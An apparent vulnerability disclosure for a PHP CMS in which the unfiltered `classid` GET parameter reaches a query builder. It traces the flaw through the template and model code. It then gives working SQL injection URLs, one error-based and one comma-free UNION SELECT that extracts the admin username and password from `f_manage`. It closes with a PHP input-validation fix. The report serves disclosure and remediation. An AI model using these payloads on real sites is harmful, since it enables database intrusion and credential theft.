### Brief description: Insufficient filtering allows bypass and injection

### Details:

In Template/article.html and Template/article_class.html:

`{$classid=$_GET['classid']}` // passed straight in from GET

```
<div class="home_box">
<div class="boxtitle">
<h3>最新推荐</h3>
</div>
<ul class="list_12">
{loop M("module")->l("article","w[classid='$classid'&&attrib_j=1&&status=1];f[title,html,date];n[10];s[id,1]") $k $v} // classid is passed straight into the query
<li><span>{date('m/d',strtotime($v['date']))}</span><a href="{url($v['html'])}">{$v['title']}</a></li>
{/loop}
</ul>
</div>
```

The rest below is the same, so it is omitted.

This obviously has the makings of an injection; it only depends on whether the later query applies any filtering. Let's try error-based injection directly:

http://localhost/?controller=classify&project=article&classify=&classid=1'%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#

![QQ截图20140811101536.png](https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png)

```
Message:Invalid SQL:select title,html,date from f_article where classid='1' and (select 1 from (select count(*) and (classid = "concat(version()") order by id desc limit 10
```

It actually turned into `and (classid = "concat(version()")`. What on earth??
Still, this already reveals that the database table prefix is f_.

Let's keep tracing to see what is going on. Locate the function l in model/moduleModel.php:

```
public function l($table,$func=""){
    $array=explode(";",$func);
    if(count($array)>1){
        foreach($array as $v){
            $this->tagsresolve($v);
        }
    }else{
        $this->tagsresolve($func);
    }
    ....
    return D($table)->field($field)->where($where)->sort($sortf,$sorts,$sortp)->limit($limit)->getall();
```

The tagsresolve function processes the parameters passed in; keep following into tagsresolve:

```
private function tagsresolve($string){
    $str=substr(substr($string,2),0,-1);
    switch(substr($string,0,1)){
        case "w": // the "w" case
            $exp=explode(',',$str); // split on commas here
            if($exp[1]){ // if our statement contains a comma, it gets processed
                return $this->op['where']=$exp[0].$this->whereclass($exp[1]);
            }elseif($str){
                return $this->op['where']=$str;
            }
            break;
```

I won't follow whereclass any further. Since commas get mangled, simply don't use any. See the proof:

### Proof of vulnerability:

http://localhost/?controller=classify&project=article&classify=&classid=2'%20%20UNION%20SELECT%20*%20FROM%20((SELECT%20admin%20from%20f_manage)a%20JOIN%20(SELECT%202)b%20JOIN%20(SELECT%20password%20from%20f_manage)c)%20%23

![QQ截图20140811092820.png](https://images.seebug.org/upload/201408/1110271942695d828d9fc98f0d2129b376d31c9c.png)
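The root cause above is that `$_GET['classid']` is interpolated unchanged into the `w[...]` tag and then into the where clause. As an added example (not the CMS's own code), this shows how the parameter can be validated at the template boundary, in the controller or before the tag string is built; the helper names safe_classid and build_article_tag are assumed, and the durable fix is parameterised queries in the model layer rather than string-built where clauses.

```php
<?php
// Added example, not the CMS's own code. Assumption: classid is an integer key
// (the report shows it compared as classid='1'), so anything that is not a plain
// run of digits can be rejected before it reaches the w[...] where-clause builder.

/**
 * Return classid from the request as an int, or null if it is not a plain
 * non-negative integer. ctype_digit() rejects '', '-1', "1'", '1 and ...',
 * so quotes, spaces, comments and keywords never reach the query string.
 */
function safe_classid(array $get): ?int
{
    if (!isset($get['classid'])) {
        return null;
    }
    $raw = (string) $get['classid'];
    if (!ctype_digit($raw) || strlen($raw) > 10) {
        return null;
    }
    return (int) $raw;
}

/**
 * Build the same tag string the template passes to M("module")->l(), but only
 * from an already-validated integer. The original template interpolates
 * $_GET['classid'] here unchanged.
 */
function build_article_tag(int $classid): string
{
    return "w[classid='{$classid}'&&attrib_j=1&&status=1];f[title,html,date];n[10];s[id,1]";
}

// Constructed inputs: a legitimate id, the two shapes of value the report used,
// and a request with no classid at all.
$samples = [
    ['classid' => '1'],
    ['classid' => "1' and (select 1 from ...)#"],
    ['classid' => "2' UNION SELECT * FROM ..."],
    [],
];
foreach ($samples as $get) {
    $id = safe_classid($get);
    if ($id === null) {
        echo 'rejected: ' . var_export($get['classid'] ?? null, true) . PHP_EOL;
    } else {
        echo 'ok: ' . build_article_tag($id) . PHP_EOL;
    }
}
```

Only the first sample produces a tag string; the others are rejected before any SQL is assembled, which is also a useful point to log for detection.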